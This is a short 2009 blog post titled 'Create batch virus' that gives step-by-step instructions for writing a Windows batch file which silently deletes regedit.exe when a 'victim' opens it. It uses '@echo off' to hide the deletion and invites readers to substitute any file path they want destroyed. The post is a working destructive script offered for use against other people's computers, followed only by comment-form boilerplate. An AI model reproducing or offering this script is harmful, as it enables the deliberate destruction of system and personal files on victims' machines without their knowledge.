Create batch virus

In this, I will tell you something about making a simple virus using .bat file. Follow the steps :

1. Open Notepad

2. Write this at the 1st line –

@echo off

3. Write this at the 2nd line –

rem deleting regedit.exe

4. Write this at the 3rd line –

del C:\WINDOWS\regedit.exe

5. Save it as a batch file (.bat)

6. The regedit.exe will be deleted if the victim opens up the .bat file.

7. @echo off is used to hide the deleting process

8. You can replace the ‘del C:\WINDOWS\regedit.exe’ with the address you want to delete.

~ by slysnake on May 11, 2009.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Connecting to %s

 
Follow

Get every new post delivered to your Inbox.